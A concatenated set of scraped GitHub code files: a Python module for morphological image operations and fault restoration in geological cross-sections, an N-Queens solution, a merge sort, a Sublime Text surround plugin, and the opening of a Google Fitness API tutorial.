this_chips.total_chip:\n \n for pos in this_chip.content:\n \n if this_tag==this_chip.tag:\n \n this_tag_content.append(pos)\n \n #I坐标取平均,求最小值 \n I_this_tag=[pos[0] for pos in this_tag_content]\n top_I_this_tag=np.mean(I_this_tag) \n \n this_tag_fraction.content=this_tag_content\n this_tag_fraction.tag=this_tag\n \n #上车上车\n total_tag_top.append(top_I_this_tag)\n total_tag_fraction.append(this_tag_fraction)\n \n #平均I与total_tag的索引\n map_top_total_tag=dict(zip(total_tag_top,which_Chip.total_tag))\n \n #total_tag和content的索引\n map_total_tag_fraction=dict(zip(which_Chip.total_tag,total_tag_fraction)) \n \n #求目标tag值\n target_tag=map_top_total_tag[min(total_tag_top)] \n \n# print(target_tag)\n \n #更新top\n top_content=[]\n \n for this_chips in which_Chip.total_chips:\n \n for this_chip in this_chips.total_chip:\n \n if this_chip.tag==target_tag:\n \n top_content+=this_chip.content\n \n #定义top\n which_Chip.top=o.fraction()\n which_Chip.top.content=top_content\n which_Chip.top.tag=target_tag\n \n #移除top\n del map_total_tag_fraction[map_top_total_tag[min(total_tag_top)]]\n\n #定义others\n which_Chip.others=list(map_total_tag_fraction.values())\n \n #检验模块\n# print(which_Chip.top.tag)\n# \n# for this_fraction in which_Chip.others:\n# print(this_fraction.tag)\n \n#9.6\n#============================================================================== \n"""把开闭运算的结果坐标存在列表里并设置背景色"""\n#target为前景的灰度值\n#腐蚀运算\n#由像素点计算的情况\ndef ImgErode(img,target):\n \n #逆时针遍历邻域内的点\n #邻域核\n neighbordict=[(i,j) for i in [-1,0,1] for j in [-1,0,1]]\n neighbordict.remove((0,0))\n\n #背景tag\n background_tag=img[0,0]\n new_img_tag=np.full(np.shape(img),background_tag)\n \n for i in range(np.shape(img)[0]):\n \n for j in range(np.shape(img)[1]): \n \n #仅作用于前景\n if img[i,j]==target:\n \n neighbor=[] \n \n #[i,j-1],[i+1,j-1],[i+1,j],[i+1,j+1],[i,j+1],[i-1,j+1],[i-1,j],[i-1,j-1]\n for item in neighbordict:\n \n #遍历新的坐标\n new_i=i+item[0]\n new_j=j+item[1]\n \n if 0<=new_i<np.shape(img)[0] and 0<=new_j<np.shape(img)[1]:\n \n neighbor.append(img[new_i,new_j])\n else:\n neighbor.append(None)\n \n #邻域值是否都相等 \n if neighbor==[img[i,j]]*len(neighbor):\n \n new_img_tag[i,j]=img[i,j]\n \n #计算结果\n result_content=[]\n \n for i in range(np.shape(new_img_tag)[0]):\n \n for j in range(np.shape(new_img_tag)[1]): \n \n #加入列表当中 \n if new_img_tag[i,j]==target:\n \n result_content.append([i,j])\n \n return new_img_tag,result_content\n \n#由content计算 \ndef ContentErode(content): \n \n #逆时针遍历邻域内的点\n #邻域核\n neighbordict=[(i,j) for i in [-1,0,1] for j in [-1,0,1]]\n neighbordict.remove((0,0))\n\n #计算后的结果列表\n new_content=[]\n \n for pos in content:\n \n neighbor=[] \n \n #[i,j-1],[i+1,j-1],[i+1,j],[i+1,j+1],[i,j+1],[i-1,j+1],[i-1,j],[i-1,j-1]\n for item in neighbordict:\n \n #遍历新的坐标\n new_i=pos[0]+item[0]\n new_j=pos[1]+item[1]\n \n #前提是这个点的位置是有效的\n if [new_i,new_j] in content:\n \n neighbor.append(True) \n else:\n neighbor.append(False)\n \n #邻域值是否都相等 \n if neighbor==len(neighbor)*[True]:\n \n new_content.append(pos)\n \n return new_content\n \n#img膨胀运算\ndef ImgExpand(img,target):\n \n #逆时针遍历邻域内的点\n #邻域核\n neighbordict=[(i,j) for i in [-1,0,1] for j in [-1,0,1]]\n neighbordict.remove((0,0))\n \n #背景tag\n background_tag=img[0,0]\n new_img_tag=np.full(np.shape(img),background_tag)\n \n for i in range(np.shape(img)[0]):\n \n for j in range(np.shape(img)[1]): \n \n #仅作用于前景\n if img[i,j]==target:\n new_img_tag[i,j]=img[i,j]\n \n #[i,j-1],[i+1,j-1],[i+1,j],[i+1,j+1],[i,j+1],[i-1,j+1],[i-1,j],[i-1,j-1]\n for item in neighbordict:\n\n #遍历新的坐标\n new_i=i+item[0]\n 
new_j=j+item[1]\n \n #重复赋值 \n if 0<=new_i<np.shape(img)[0] and 0<=new_j<np.shape(img)[1]:\n \n new_img_tag[new_i,new_j]=img[i,j]\n \n #计算结果\n result_content=[]\n \n for i in range(np.shape(new_img_tag)[0]):\n \n for j in range(np.shape(new_img_tag)[1]): \n \n #加入列表当中 \n if new_img_tag[i,j]==target:\n \n result_content.append([i,j])\n \n return new_img_tag,result_content\n \n \n#content膨胀运算\ndef ContentExpand(content):\n \n #逆时针遍历邻域内的点\n #邻域核\n neighbordict=[(i,j) for i in [-1,0,1] for j in [-1,0,1]]\n neighbordict.remove((0,0))\n \n #膨胀操作后的结果\n new_content=[]\n \n for pos in content:\n \n #[i,j-1],[i+1,j-1],[i+1,j],[i+1,j+1],[i,j+1],[i-1,j+1],[i-1,j],[i-1,j-1]\n for item in neighbordict:\n \n #遍历新的坐标\n new_i=pos[0]+item[0]\n new_j=pos[1]+item[1]\n \n #增加新的点儿\n if [new_i,new_j] not in content:\n \n new_content.append([new_i,new_j])\n \n #增加new_content\n new_content+=content\n \n return new_content\n\n#9.19\n#============================================================================== \n#target_tag为要做处理的tag\n#n为迭代次数\n#由像素矩阵计算 \n#结构闭运算\ndef ImgClose(img_rgb,rgb_dict,background_rgb,target_tag,n,show=False):\n \n #转化为单通道\n new_img_tag=RGB2Tag(img_rgb,rgb_dict)\n \n# print(np.shape(new_img_tag))\n \n #初始化new_content\n new_content=[]\n \n for i in range(np.shape(new_img_tag)[0]):\n \n for j in range(np.shape(new_img_tag)[1]):\n \n if new_img_tag[i,j]==target_tag:\n \n new_content.append([int(i),int(j)])\n \n #必须有执行次数.若n=0,则不执行咯\n if n: \n #先膨胀\n for k in range(n): \n new_img_tag,new_content=ImgExpand(new_img_tag,target_tag)\n \n #后侵蚀\n for k in range(n):\n new_img_tag,new_content=ImgErode(new_img_tag,target_tag) \n \n # print(np.shape(new_img_rgb))\n \n #着色\n new_img_rgb=np.full(np.shape(img_rgb),background_rgb)\n\n for pos in new_content: \n new_img_rgb[pos[0],pos[1]]=rgb_dict[target_tag]\n \n #显示计算结果\n if show:\n plt.figure()\n plt.imshow(new_img_rgb)\n \n return new_img_rgb,new_content\n \n#由列表计算 \ndef ContentClose(content,n,show=False): \n\n #先膨胀\n for k in range(n): \n content=ContentExpand(content)\n\n #后侵蚀\n for k in range(n):\n content=ContentErode(content) \n \n return content\n \n#结构开运算\n#由像素矩阵计算 \ndef ImgOpen(img_rgb,rgb_dict,background_rgb,target_tag,n,show=False):\n \n #转化为单通道\n new_img_tag=RGB2Tag(img_rgb,rgb_dict)\n \n #初始化new_content\n new_content=[]\n \n for i in range(np.shape(new_img_tag)[0]):\n \n for j in range(np.shape(new_img_tag)[1]):\n \n if new_img_tag[i,j]==target_tag:\n \n new_content.append([int(i),int(j)])\n \n #必须有执行次数.若n=0,则不执行咯\n if n:\n #先侵蚀\n for k in range(n):\n new_img_tag,new_content=ImgErode(new_img_tag,target_tag)\n \n #后膨胀\n for k in range(n): \n new_img_tag,new_content=ImgExpand(new_img_tag,target_tag) \n \n #着色\n new_img_rgb=np.full(np.shape(img_rgb),background_rgb)\n \n for pos in new_content: \n new_img_rgb[pos[0],pos[1]]=rgb_dict[target_tag]\n \n #显示计算结果\n if show:\n plt.figure()\n plt.imshow(new_img_rgb)\n \n return new_img_rgb,new_content\n\n#由列表计算 \ndef ContentOpen(content,n,show=False): \n \n #先侵蚀\n for k in range(n):\n content=ContentErode(content)\n \n #后膨胀\n for k in range(n): \n content=ContentExpand(content) \n \n return content\n \n#9.7\n#============================================================================== \n"""如何变得好看,平滑?闭运算?"""\n#对Chips集合进行高度校正\n#extent表示闭运算的程度\ndef ChipsRegularization(CHIP_1,CHIP_2,img_rgb,rgb_dict,extent=0,show=False,output=True):\n \n #将Chip分别正则化\n CHIP_1.Regularize()\n CHIP_2.Regularize()\n \n #校正CHIPS的总高度\n# I_top_1=min([pos[0] for pos in CHIP_1.content])\n# I_top_2=min([pos[0] for pos in 
CHIP_2.content])\n# \n #两偏移距与高度的差之和为恒定值\n# I_offset_1=int(np.round((I_top_2-I_top_1)/2))\n# I_offset_2=int(I_top_1-I_top_2+I_offset_1)\n \n# print(I_top_1,I_top_2)\n# print(I_offset_1,I_offset_2)\n \n# CHIP_1.Move(I_offset_1,0)\n# CHIP_2.Move(I_offset_2,0)\n\n #更新顶层\n CHIP_1.UpdateTop()\n CHIP_2.UpdateTop()\n \n if show:\n \n #显示fraction集合\n img_rgb_top=ShowFractions([CHIP_1.top,CHIP_2.top],img_rgb,rgb_dict,output=True)\n \n# print(np.shape(img_rgb_top))\n \n #闭运算\n ImgClose(img_rgb_top,rgb_dict,img_rgb[0,0],CHIP_1.top.tag,extent,show)\n \n return CHIP_1,CHIP_2\n\n"""\ncase 1:top消失的函数 ok\ncase 2:将others融入top的函数 ok\ncase 3:自动识别下一个fault的函数 手动勾选\ncase 4:定义类的侵蚀和膨胀函数 ok\n"""\n\n#============================================================================== \n#在Chip对象当中DeleteTop\n#extent表示Close的次数\ndef DeleteTop(which_Chip,extent=0,show=False):\n \n# print(which_Chip.top.tag)\n \n for this_chips in which_Chip.total_chips:\n \n #遍历副本,避免边遍历边删除\n for this_chip in list(this_chips.total_chip):\n \n# print('this chip tag is')\n# print(this_chip.tag)\n \n if this_chip.tag==which_Chip.top.tag:\n \n this_chips.total_chip.remove(this_chip)\n \n# print(this_chips.total_chip)\n \n this_chips.Init()\n \n# print(this_chips.total_chip)\n# print(this_chips.content)\n \n #更新一波 \n which_Chip.Init()\n \n# #使用前\n# if show: \n# which_Chip.top.Show(img_rgb,rgb_dict)\n\n #top的内容\n top_content=ContentClose(which_Chip.top.content,extent)\n\n top_fraction=o.fraction()\n top_fraction.content=top_content\n top_fraction.tag=which_Chip.top.tag\n \n which_Chip.top=top_fraction\n \n #fault的内容\n fault_content=ContentClose(which_Chip.fault_content,extent)\n \n fault_fraction=o.fraction()\n fault_fraction.content=fault_content\n fault_fraction.tag=-1\n \n# #使用后\n# if show:\n# which_Chip.top.Show(img_rgb,rgb_dict)\n\n """输出新的top和fault,若新的layer不止一层需要修改成新的对象"""\n \n #先输出top后输出fault,避免覆盖\n return [top_fraction,fault_fraction]\n\n#9.17\n \n#增加底色并修改尺寸\n#i_bottom为画布的底部i坐标,默认为0\ndef AddBase(img_tag,i_bottom):\n \n import copy\n new_img_tag=copy.deepcopy(img_tag)\n \n #每一列,自下而上遍历\n for j in range(np.shape(img_tag)[1]):\n \n for i in range(np.shape(img_tag)[0]-1,i_bottom,-1):\n \n #找到奇怪的点\n if img_tag[i,j]!=0:\n\n #全用base_tag替代\n new_img_tag[i:i_bottom,j]=np.array([-2]*len(img_tag[i:i_bottom,j]))\n \n break\n \n return new_img_tag\n\n#在画布上画上这些fraction的content\n#计算top基底和断层矩阵的函数\n#简单模型:仅有TopBaseFault各一个的情况\ndef TopBaseFault(Chips,img_tag,rgb_dict,extent,i_bottom):\n \n #新的输出矩阵\n new_img_tag=np.zeros(np.shape(img_tag))\n \n for this_Chip in Chips:\n \n #删除Top\n top_fraction,fault_fraction=DeleteTop(this_Chip,extent)\n\n #先画top\n for pos in top_fraction.content:\n \n new_img_tag[int(pos[0]),int(pos[1])]=top_fraction.tag\n \n #再根据top的位置绘制base\n new_img_tag=AddBase(new_img_tag,i_bottom)\n \n #最后绘制fault\n for pos in fault_fraction.content:\n \n new_img_tag[pos[0],pos[1]]=fault_fraction.tag\n \n return new_img_tag\n\n#============================================================================== \n#修改tag矩阵的尺寸\n#i_top表示顶部留白,默认为0\n#即删除空白\ndef FitSize(img_tag,i_top=0,show=False):\n \n #遍历:寻找图像的上下左右边界\n \n #上\n for i in range(np.shape(img_tag)[0]): \n \n if list(img_tag[i,:])!=[0]*len(img_tag[i,:]):\n \n top=i\n \n break\n \n #下\n for i in range(np.shape(img_tag)[0]-1,0,-1): \n \n if list(img_tag[i,:])!=[0]*len(img_tag[i,:]):\n \n bottom=i\n \n break \n \n #左\n for j in range(np.shape(img_tag)[1]): \n \n if list(img_tag[:,j])!=[0]*len(img_tag[:,j]):\n \n left=j\n \n break\n \n #右 \n for j in range(np.shape(img_tag)[1]-1,0,-1):\n \n if 
list(img_tag[:,j])!=[0]*len(img_tag[:,j]):\n\n right=j\n \n break\n \n# print(left,right,top,bottom)\n \n #显示模块\n if show:\n \n plt.figure()\n plt.imshow(img_tag[top-i_top:bottom+1,left:right+1])\n plt.axis('off')\n \n return img_tag[top-i_top:bottom+1,left:right+1]\n\n#计算当下长度\ndef CalculateLength(img_rgb,rgb_dict,show=False):\n\n img_tag=FitSize(RGB2Tag(img_rgb,rgb_dict))\n img_rgb=np.array(Tag2RGB(img_tag,rgb_dict),dtype=np.uint8)\n \n #显示模块\n if show:\n \n plt.figure()\n plt.imshow(img_rgb)\n #plt.axis('off')\n\n return np.shape(img_rgb)[1]\n\n"""\n1 os.path.exists(path) 判断一个目录是否存在\n2 os.makedirs(path) 多层创建目录\n3 os.mkdir(path) 创建目录\n"""\n#11.12\n#============================================================================== \n#在某路径下判断并创建文件夹\ndef GenerateFold(path):\n \n #引入模块\n import os\n \n #去除首位空格\n path=path.strip()\n \n #去除尾部\\符号\n path=path.rstrip("\\\\")\n \n #判断路径是否存在(True/False)\n Exist=os.path.exists(path)\n \n #判断结果\n if not Exist:\n \n #如果不存在则创建目录\n #创建目录操作函数\n os.makedirs(path) \n \n#9.26\n#============================================================================== \n#打印计算结果\n#unit:像素点与长度换算单位\n#save_path:保存路径\ndef PrintResult(save_path,unit,length_before,length_now):\n \n #判断并创建文件夹\n GenerateFold(save_path)\n \n #将计算结果写入result.txt文件\n with open(save_path+'\\\\'+"result.txt","w") as file:\n \n file.write('原始长度:%5.2fkm'\n %(length_before/unit))\n \n file.write('\\n')\n \n file.write('当下长度:%5.2fkm'\n %(length_now/unit))\n \n if length_before>length_now:\n \n file.write('\\n')\n file.write('缩短量:%5.2fkm'\n %(float(length_before-length_now)/unit))\n \n file.write('\\n')\n file.write('缩短率:%5.2f%%'\n %(float(length_before-length_now)/length_before*100))\n \n if length_before<length_now:\n \n file.write('\\n')\n file.write('拉张量:%5.2fkm'\n %-(float(length_before-length_now)/unit))\n \n file.write('\\n')\n file.write('拉张率:%5.2f%%'\n %-(float(length_before-length_now)/length_before*100))\n \n \n print('')\n \n print('原始长度:%5.2fkm'%(length_before/unit))\n print('当下长度:%5.2fkm'%(length_now/unit))\n \n if length_before>length_now:\n \n print('缩短量:%5.2fkm'\n %(float(length_before-length_now)/unit))\n \n print('缩短率:%5.2f%%'\n %(float(length_before-length_now)/length_before*100))\n \n if length_before<length_now:\n \n print('拉张量:%5.2fkm'\n %-(float(length_before-length_now)/unit))\n \n print('拉张率:%5.2f%%'\n %-(float(length_before-length_now)/length_before*100))\n \n#10.18 \n#============================================================================== \n#根据新的keys排布dict\ndef DictOrderByKeys(which_dict,new_keys):\n \n #先判断keys和dict的keys是否相同\n if list(set(new_keys))!=list(set(which_dict.keys())):\n \n print('ERROR:invalid keys')\n \n return \n \n #正常情况下\n if list(set(new_keys))==list(set(which_dict.keys())):\n \n #建立新的values列表\n new_values=[which_dict[this_key] for this_key in new_keys]\n \n new_dict=dict(zip(new_keys,new_values))\n \n return new_dict\n \n#根据新的values排布dict\ndef DictOrderByValues(which_dict,new_values):\n \n #先判断keys和dict的keys是否相同\n if list(set(new_values))!=list(set(which_dict.values())):\n \n print('ERROR:invalid values')\n \n return\n \n #正常情况下\n if list(set(new_values))==list(set(which_dict.values())):\n \n #建立新的keys列表\n new_keys=[DictKeyOfValue(which_dict,this_value) for this_value in new_values]\n \n new_dict=dict(zip(new_keys,new_values))\n \n return new_dict\n\n#10.17\n#============================================================================== \n#写一个把像素点往上推的函数\n#img_tag为输入的tag矩阵\ndef PushUpImg(img_tag):\n \n #基底tag\n 
base_tag=GetBaseTag(img_tag)\n \n #空白tag\n blank_tag=0\n \n #建立新的img_tag\n new_img_tag=np.zeros((np.shape(img_tag)[0],np.shape(img_tag)[1]))\n \n for column in range(np.shape(img_tag)[1]):\n \n #所有的tag\n tag_list=list(set(list(img_tag[:,column])))\n \n #tag对应的depth列表\n depth_list=[]\n \n #遍历所有tag及其深度\n for this_tag in tag_list:\n \n that_depth=np.mean(list(np.where(img_tag[:,column]==this_tag)))\n \n depth_list.append(that_depth)\n \n #tag与深度建立索引\n map_tag_depth=dict(zip(tag_list,depth_list))\n\n #深度list,从小到大来排列\n new_depth_list=sorted(depth_list,reverse=False)\n \n# print(map_tag_depth)\n# print(new_depth_list)\n \n# print(list(map_tag_depth.keys()))\n# print(list(map_tag_depth.keys())==tag_list)\n \n #重组dict\n new_map_tag_depth=DictOrderByValues(map_tag_depth,new_depth_list)\n \n# print(new_map_tag_depth)\n \n #得到了新的tag列表\n new_tag_list=list(new_map_tag_depth.keys())\n \n# print(new_tag_list)\n \n #各个tag的数量\n map_tag_frequency=List2FrequencyDict(img_tag[:,column])\n \n# print(map_tag_frequency)\n \n #频率列表\n# frequency_list=list(map_tag_frequency.values())\n \n# print(frequency_list)\n\n \"\"\"把白色换掉??\"\"\"\n if base_tag in new_tag_list and blank_tag in new_tag_list:\n \n# print(map_tag_frequency[base_tag])\n# print(map_tag_frequency[blank_tag])\n \n #把blank贴到base \n map_tag_frequency[base_tag]+=map_tag_frequency[blank_tag]\n \n #把空白抹掉\n map_tag_frequency.pop(blank_tag)\n \n# print(column) \n# print(map_tag_frequency)\n# print(map_tag_frequency.keys())\n \n #新的列\n new_content=[]\n \n #重新排布\n for this_tag in list(map_tag_frequency.keys()):\n \n new_content+=map_tag_frequency[this_tag]*[this_tag]\n \n# print(len(new_content))\n# print(np.shape(new_img_tag)[0])\n# \n# print(len(new_content)==np.shape(new_img_tag)[0])\n \n #数量不符合就不和他玩了\n if len(new_content)!=np.shape(new_img_tag)[0]:\n \n print('ERROR:invalid column')\n \n return \n \n #正常情况下\n if len(new_content)==np.shape(new_img_tag)[0]:\n \n #新的列应当是这样的\n new_img_tag[:,column]=new_content\n \n return new_img_tag \n \n#10.18\n#============================================================================== \n#点击拾取fractions对象并生成plate对象\n#total_fractions表示图像中的所有fraction对象\ndef PickAndGeneratePlate(total_fractions,img_rgb):\n\n print('')\n print('here comes a new plate')\n \n #建立fractions的content\n Content=[]\n \n #建立pos总集合\n for this_fraction in total_fractions:\n \n Content+=this_fraction.content\n \n #这个plate中所有的fractions\n that_fractions=[]\n \n count=0\n \n import copy\n \n #像素矩阵\n img_rgb_temp=copy.deepcopy(img_rgb)\n \n #循环呗\n while True:\n \n print('......')\n print('please pick the layer')\n \n #点击获取像素点坐标\n layer_point_pos=plt.ginput(1)[0]\n \n #注意反过来,因为是xy坐标\n pos_xy=[int(layer_point_pos[0]),int(layer_point_pos[1])]\n \n pos_IJ=copy.deepcopy(pos_xy)\n \n #IJ形式是xy形式的颠倒\n pos_IJ.reverse()\n \n # print('......')\n # print(pos_IJ)\n \n #如果点到外面,此plate的fraction提取结束\n if pos_IJ not in Content:\n \n print('......')\n print('layer picking of this plate is over')\n \n break\n \n #判断这个坐标合理与否\n for this_fraction in total_fractions:\n \n #判断他在哪\n if pos_IJ in this_fraction.content:\n \n #且不在已收录的fraction对象集中\n if this_fraction in that_fractions: \n \n print('......')\n print('this layer is already picked')\n \n break\n \n if this_fraction not in that_fractions:\n \n count+=1\n \n print('......')\n print('picking the layer'+''+str(count))\n \n ShowEdge(this_fraction,img_rgb_temp)\n \n that_fractions.append(this_fraction)\n \n break\n \n #显示一下呗\n plt.figure()\n plt.imshow(img_rgb_temp)\n\n #生成的plate对象\n that_plate=o.plate()\n \n #初始化\n 
that_plate.Init(that_fractions)\n \n return that_plate\n\n#============================================================================== \n#表示chips和中点坐标对应关系的键值对\n#axis:'both','I','J'分别表示行列索引,行索引,列索引\ndef MapCenterchipsOf(which_Chip,axis):\n\n map_J_total_chips={}\n \n for this_chips in which_Chip.total_chips:\n \n if this_chips.center!=None:\n \n #以下两句意思一样的\n# map_J_total_chips.update({this_chips:this_chips.center[1]})\n# map_J_total_chips[this_chips]=this_chips.center[1] \n \n #行索引\n if axis=='I':\n \n map_J_total_chips[this_chips]=this_chips.center[0] \n \n #列索引\n if axis=='J':\n \n map_J_total_chips[this_chips]=this_chips.center[1] \n \n #行列索引\n if axis=='both':\n \n map_J_total_chips[this_chips]=this_chips.center\n \n# print(map_J_total_chips)\n \n return map_J_total_chips\n\n#返回两端的chips\n#side表示边,有'left'和'right'两个选项\ndef chipsOf(which_Chip,side):\n \n #先建立键值对\n #根据values的值返回chips对象\n map_J_total_chips=MapCenterchipsOf(which_Chip,'J')\n \n #最左的即J最小的chips\n if side=='left':\n \n return DictKeyOfValue(map_J_total_chips,min(list(map_J_total_chips.values())))\n\n #最右的即J最大的chips\n if side=='right':\n \n return DictKeyOfValue(map_J_total_chips,max(list(map_J_total_chips.values())))\n\n#which_chips中行索引最小的所有pos集合\ndef TopIPosIn(which_chips):\n \n #求最高点的所有坐标\n I_which_chips=[pos[0] for pos in which_chips.content]\n \n# print(I_which_chips)\n \n top_I_which_chips=min(I_which_chips)\n \n# print(top_I_which_chips)\n# print(which_chips.content)\n \n #返回这一行中所有满足top的点\n top_I_pos_in_which_chips=[pos for pos in which_chips.content if pos[0]==top_I_which_chips]\n \n# print(top_I_pos_in_which_chips)\n\n return top_I_pos_in_which_chips\n\n#返回左右chips的距离最近的两个点 \n#side表示左右chips\ndef SpecialPointOf(which_chips,side):\n \n #先求which_chips中行索引最小的所有pos集合\n top_I_pos_in_which_chips=TopIPosIn(which_chips)\n \n# print(top_I_pos_in_which_chips)\n \n #求他们的行列索引集合\n I_top_I_pos_in_which_chips=[pos[0] for pos in top_I_pos_in_which_chips]\n J_top_I_pos_in_which_chips=[pos[1] for pos in top_I_pos_in_which_chips]\n \n# print(I_top_I_pos_in_which_chips)\n# print(J_top_I_pos_in_which_chips)\n \n #建立索引呗\n map_JI_top_I_pos_in_which_chips=dict(zip(J_top_I_pos_in_which_chips,I_top_I_pos_in_which_chips))\n \n# print(map_JI_top_I_pos_in_which_chips)\n \n #max在右\n if side=='right':\n \n special_point=[map_JI_top_I_pos_in_which_chips[max(J_top_I_pos_in_which_chips)],max(J_top_I_pos_in_which_chips)]\n \n #min在左\n if side=='left':\n \n special_point=[map_JI_top_I_pos_in_which_chips[min(J_top_I_pos_in_which_chips)],min(J_top_I_pos_in_which_chips)]\n \n# print(special_point)\n \n return special_point\n \n#将Chips对象聚合在一起\n#先处理两个Chip对象\ndef Cohere(Chips):\n \n #根据中点来判断\n J_center_Chips=[this_Chip.center[1] for this_Chip in Chips]\n \n #建立Chip和J值的索引关系\n map_J_center_Chips=dict(zip(Chips,J_center_Chips))\n\n #min在左\n Chip_left=DictKeyOfValue(map_J_center_Chips,min(list(map_J_center_Chips.values())))\n \n #max在右\n Chip_right=DictKeyOfValue(map_J_center_Chips,max(list(map_J_center_Chips.values())))\n \n# print(Chip_left.center)\n# print(Chip_right.center)\n \n #取Chip_left中最右的\n chips_left=chipsOf(Chip_left,'right')\n \n #取Chip_right中最左的\n chips_right=chipsOf(Chip_right,'left')\n\n# print(chips_right,chips_left)\n \n #根据其坐标进行移动\n# print(chips_right.center)\n# print(chips_left.center)\n# \n# print(chips_right.content)\n# print(chips_left.content)\n\n I_offset=SpecialPointOf(chips_right,'left')[0]-SpecialPointOf(chips_left,'right')[0]\n J_offset=SpecialPointOf(chips_right,'left')[1]-SpecialPointOf(chips_left,'right')[1]\n \n# 
print(I_offset,J_offset)\n \n #左右盘的位移\n I_offset_left=int(np.floor(I_offset/2))\n J_offset_left=int(np.floor(J_offset/2))\n \n #右边的偏移距 \n I_offset_right=abs(abs(abs(I_offset)-abs(I_offset_left))) \n J_offset_right=abs(abs(abs(J_offset)-abs(J_offset_left)))\n \n #判断是否为0 \n #乘上算子\n if I_offset_left!=0:\n \n I_offset_right*=(-I_offset_left/abs(I_offset_left))\n \n if J_offset_left!=0:\n \n J_offset_right*=(-J_offset_left/abs(J_offset_left))\n \n# print(I_offset_left,J_offset_left)\n# print(I_offset_right,J_offset_right)\n \n# print(Chip_left.center)\n# print(Chip_right.center)\n\n #移动Chip_left,Chip_right\n Chip_left.Move(I_offset_left,J_offset_left)\n Chip_right.Move(I_offset_right,J_offset_right)\n\n# print(Chip_left.center)\n# print(Chip_right.center)\n \n return [Chip_left,Chip_right]\n","repo_name":"jerryweihuajing/Balanced-Cross-Section","sub_path":"other/fault_motion/module_fault_motion.py","file_name":"module_fault_motion.py","file_ext":"py","file_size_in_byte":143689,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"33184891701","text":"class Solution:\n def solveNQueens(self, n: int) -> List[List[str]]:\n res = []\n def dfs(path):\n nonlocal res\n if len(path) == n:\n res.append(path)\n return \n for j in range(n):\n if path and any(c==j or len(path)-j==r-c or len(path)+j==r+c for r, c in enumerate(path)):\n continue\n dfs(path+[j])\n return \n\n def func(path):\n board = []\n for j in path:\n board.append('.'*j+'Q'+'.'*(n-j-1))\n return board\n\n dfs([])\n \n return list(map(func,res))","repo_name":"zhenfelix/OnlineJudgeCodings","sub_path":"LeetCode/面试题/面试题 08.12. 八皇后.py","file_name":"面试题 08.12. 八皇后.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"38666495689","text":"import math\n\nsortThis = [2,3,2,1,0]\nprint('this is supposed to merge sort this: \\n')\nprint(sortThis)\n\ndef mergeSort(array):\n\tif len(array) > 1:\n\t\tif len(array) > 1:\n\t\t\tmid = len(array)//2\n\t\t\tleft = array[:mid]\n\t\t\tright = array[mid:]\n\n\t\t\tmergeSort(left)\n\t\t\tmergeSort(right)\n\n\t\t\ta = 0\n\t\t\tb = 0\n\t\t\tc = 0\n\t\t\tlenLeft = len(left)\n\t\t\tlenRight = len(right)\n\n\t\t\twhile a < lenLeft and b < lenRight:\n\t\t\t\tif left[a] < right[b]:\n\t\t\t\t\tarray[c] = left[a]\n\t\t\t\t\ta = a + 1\n\t\t\t\telse:\n\t\t\t\t\tarray[c]=right[b]\n\t\t\t\t\tb = b + 1\n\t\t\t\tc = c + 1\n\t\t\twhile a < lenLeft :\n\t\t\t\tarray[c] = left[a]\n\t\t\t\ta = a + 1\n\t\t\t\tc = c + 1\n\t\t\twhile b < lenRight:\n\t\t\t\tarray[c] = right[b]\n\t\t\t\tb = b + 1\n\t\t\t\tc = c + 1\n\nmergeSort(sortThis)\nprint(\"I sorted this: \", sortThis) \n","repo_name":"gewenyu99/yeet-code","sub_path":"snakes/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"11774213343","text":"import sublime_plugin\n\n\nclass SublimeSurroundCommand(sublime_plugin.TextCommand):\n\n def on_done(self, word):\n\n for region in self.view.sel():\n\n if not region.empty():\n\n # Get the selected text\n s = self.view.substr(region)\n\n # Surround word by input word\n surroundStr = word + s + word\n\n # Begin new edit session for `undo` to work correctly\n edit = self.view.begin_edit();\n\n # Replace the selection with transformed text\n self.view.replace(edit, region, surroundStr)\n\n # We need to end the session explicitely\n 
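                # Note: begin_edit()/end_edit() is the Sublime Text 2 API;
                # Sublime Text 3 removed both, and a TextCommand must instead
                # mutate the buffer through the `edit` handle passed into
                # run(). A minimal sketch of the same replacement under the
                # newer API, assuming the surround word is forwarded through
                # run's kwargs rather than captured in on_done:
                #
                #     def run(self, edit, word=''):
                #         for region in self.view.sel():
                #             if not region.empty():
                #                 s = self.view.substr(region)
                #                 self.view.replace(edit, region, word + s + word)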
self.view.end_edit(edit);\n\n def run(self, edit):\n\n self.edit = edit\n\n # Show input panel for surround word, then handling input\n self.view.window().show_input_panel('Surrond Word: ', '',\n self.on_done, None, None)\n","repo_name":"shinobukawano/sublime_surround","sub_path":"sublime_surround.py","file_name":"sublime_surround.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"96"} +{"seq_id":"34470870409","text":"'''\r\n1. set-up: https://developers.google.com/fit/rest/v1/get-started\r\n 1.1 set-up Credential -> stay in Testing don't press Publish (you can invite up to 100 collaborators in this state as well)\r\n 1.2 set-up OAuth 2.0 client ID\r\n2. Get Access-token from OAuth Playground when exchanging authorization code for tokens seen in 3.1 fitness api - access code.png \r\n3. set-up requests = same as in 1. fitbit.py\r\n 3.1 what can we get from this API: https://developers.google.com/fit/rest/v1/reference\r\n 3.1.0 userID = me <--- always!\r\n 3.1.1 -> let's see what dataSources there are. Replace down in the code the url with this url:\r\n url = \"https://www.googleapis.com/fitness/v1/users/me/dataSources\"\r\n\r\n -> to be able to GET data from these sources we will need to add the \"dataStreamID\" NOT the \"name\" at the end of our urls (see later)\r\n -> it is quite confusing, because in the documentation they only list the names, not the dataStreamIDs (https://developers.google.com/fit/datatypes/activity)\r\n -> also we would need to use MERGE datasource (these IDs start with \"derived\", not \"raw\" -> this is important as thanks to Google Health Connect\r\n the Fitness API is pulling data from all of our connected apps on our phone. So we want to list the aggregated data not just from 1 source\r\n \r\n -> BUT FIRST LET'S GET THE DATASOURCE SAVED IN AN EXCEL -> Use ChatGPT\r\n write: this is my json response I get, only print the dataStreamIDs, {insert the whole json object response that you get when you called the url}\r\n write: also get back beside the dataStreamIDs the corresponding name that is given back in the dataType\r\n write: let's save it to an excel where name is column A and id is B\r\n\r\n in command line install pandas - pip install panda\r\n\r\n SEE CODE BELOW -> comment out corresponding\r\n \r\n 3.1.2 